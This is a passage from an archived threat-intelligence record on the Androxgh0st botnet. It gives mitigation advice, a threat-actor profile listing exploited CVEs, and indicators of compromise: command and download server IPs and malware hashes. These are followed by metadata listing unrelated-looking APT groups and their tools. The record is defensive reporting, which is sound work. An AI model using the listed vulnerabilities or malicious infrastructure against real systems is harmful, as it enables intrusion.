Use continuous attack surface scanners to detect any unpatched services or applications.\r\nUpdate Firmware and Software Regularly: Ensure that all devices, particularly IoT devices and routers, are running the latest firmware versions, as Androxgh0st targets unpatched CVEs.\r\n7. Check Logs for Signs of Persistence Mechanisms\r\nLook for Modified Configuration Files: Review configuration files for any injected commands that would re-launch the bot on reboot. This includes files such as /etc/rc.local, .bashrc, or any custom startup scripts.\r\nAudit System Logs for Malicious Activity Patterns: Look for patterns in auth.log, syslog, or application logs that may indicate Androxgh0st’s activity, including unexpected root login attempts or commands executed by the web server’s user account.\r\nThreat Actor Activity and Rating\r\nThreat Actor Profiling\r\nActive since: January 2024\r\nReputation: HIGH\r\nCurrent status: ACTIVE\r\nHistory: Androxgh0st remains actively deployed in the wild, even after the Mozi kill-switch activation. 
It scans for vulnerable infrastructure and has now expanded its targets from Laravel and Apache servers alone to a wide technology stack, including but not limited to network gateway devices and WordPress.\r\nRating: HIGH\r\nDetails:\r\nKnown for exploiting well-documented vulnerabilities (e.g., CVE-2017-9841 in PHPUnit and CVE-2021-41773 in Apache HTTP Server) to establish control over web servers.\r\nUses a botnet for systematic exploitation, scanning, and persistent access via file uploads and backdoors.\r\nHas exploited a wide range of vulnerabilities across different software (e.g., Jira, Metabase, Sophos) to expand its control and facilitate remote code execution (RCE).\r\nReferences\r\n* Intelligence source and information reliability - Wikipedia\r\n# Traffic Light Protocol - Wikipedia\r\nAppendix\r\nIndicators\r\nRequest Logger and Command Sender - Androxgh0st\r\n165.22.184[.]66\r\n45.55.104[.]59\r\napi[.]next[.]eventsrealm[.]com (Eventsrealm is a Jamaica-based events aggregator platform)\r\nTP-Link Router Exploitation - Download servers\r\n45.202.35[.]24\r\n154.216.17[.]31\r\nGeoServer Exploitation - Download servers\r\n206.189.109[.]146\r\n149.88.44[.]159\r\nNetgear Router Exploitation - Download server\r\n200.124.241[.]140\r\nGPON Router Exploitation - Download server\r\n117.215.206[.]216\r\nRuckus Wireless Admin (CVE-2023-25717)\r\n45.221.98[.]117\r\nFile Hashes - Androxgh0st TP-Link Exploitation (MD5)\r\n2403a89ab4ffec6d864ac0a7a225e99a\r\nd9553ca3d837f261f8dfda9950978a0a\r\nc8340927faaf9dccabb84a849f448e92\r\na2021755d4d55c39ada0b4abc0c8bcf5\r\ndb2a59a1fd789d62858dfc4f436822d7\r\ndd5e7a153bebb8270cf0e7ce53e05d9c\r\nf75061ac31f8b67ddcd5644f9570e29b\r\n45b5c4bff7499603a37d5a665b5b4ca3\r\n6f8a79918c78280aec401778564e3345\r\n
e3e6926fdee074adaa48b4627644fccb\r\nabab0da6685a8eb739027aee4a5c4eaa\r\n2938986310675fa79e01af965f4ace4f\r\na6609478016c84aa235cd8b3047223eb\r\n3cb30d37cdfe949ac1ff3e33705f09e3\r\n0564f83ada149b63a8928ff7591389f3\r\n3d48dfd97f2b77417410500606b2ced6\r\nFile Hashes - Androxgh0st GeoServer Exploitation (MD5)\r\nf2af8db568f135cd9a788b7caff4d517\r\n74f85c38ff44ff3b85124caf555cec27\r\nde86cb78023ce013f3b2b5e618b61401\r\n6f5a16332cb0b8fc787f1b1d30f5857a\r\n2e599db6456fb778f8bc8d28837d5a45\r\nKoushik Pal is a Threat Researcher at CloudSEK, specializing in digital forensics, incident response, and adversary hunting to uncover attacker motives, methods, and operations.\r\nFigure (page 4): Hunting for malicious infrastructure: misconfigured Logger and Command Sender panels. The servers store the POST and GET requests from the botnet agent over time.\r\nSource: https://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave"
	],
	"report_names": [
		"mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "58db0213-4872-41fe-8a76-a7014d816c73",
			"created_at": "2023-01-06T13:46:38.61757Z",
			"updated_at": "2026-04-10T02:00:03.040816Z",
			"deleted_at": null,
			"main_name": "Tonto Team",
			"aliases": [
				"G0131",
				"PLA Unit 65017",
				"Earth Akhlut",
				"TAG-74",
				"CactusPete",
				"KARMA PANDA",
				"BRONZE HUNTLEY",
				"Red Beifang"
			],
			"source_name": "MISPGALAXY:Tonto Team",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "da483338-e479-4d74-a6dd-1fb09343fd07",
			"created_at": "2022-10-25T15:50:23.698197Z",
			"updated_at": "2026-04-10T02:00:05.355597Z",
			"deleted_at": null,
			"main_name": "Tonto Team",
			"aliases": [
				"Tonto Team",
				"Earth Akhlut",
				"BRONZE HUNTLEY",
				"CactusPete",
				"Karma Panda"
			],
			"source_name": "MITRE:Tonto Team",
			"tools": [
				"Mimikatz",
				"Bisonal",
				"ShadowPad",
				"LaZagne",
				"NBTscan",
				"gsecdump"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "17d16126-35d7-4c59-88a5-0b48e755e80f",
			"created_at": "2025-08-07T02:03:24.622109Z",
			"updated_at": "2026-04-10T02:00:03.726126Z",
			"deleted_at": null,
			"main_name": "BRONZE HUNTLEY",
			"aliases": [
				"CactusPete ",
				"Earth Akhlut ",
				"Karma Panda ",
				"Red Beifang",
				"Tonto Team"
			],
			"source_name": "Secureworks:BRONZE HUNTLEY",
			"tools": [
				"Bisonal",
				"RatN",
				"Royal Road",
				"ShadowPad"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c39b0fe6-5642-4717-9a05-9e94265e3e3a",
			"created_at": "2022-10-25T16:07:24.332084Z",
			"updated_at": "2026-04-10T02:00:04.940672Z",
			"deleted_at": null,
			"main_name": "Tonto Team",
			"aliases": [
				"Bronze Huntley",
				"CactusPete",
				"Earth Akhlut",
				"G0131",
				"HartBeat",
				"Karma Panda",
				"LoneRanger",
				"Operation Bitter Biscuit",
				"TAG-74",
				"Tonto Team"
			],
			"source_name": "ETDA:Tonto Team",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"Bioazih",
				"Bisonal",
				"CONIME",
				"Dexbia",
				"Korlia",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"POISONPLUG.SHADOW",
				"RoyalRoad",
				"ShadowPad Winnti",
				"XShellGhost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434006,
	"ts_updated_at": 1775791940,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e7980900e51ed1349bb6b1216fc08c7a366d6c63.pdf",
		"text": "https://archive.orkl.eu/e7980900e51ed1349bb6b1216fc08c7a366d6c63.txt",
		"img": "https://archive.orkl.eu/e7980900e51ed1349bb6b1216fc08c7a366d6c63.jpg"
	}
}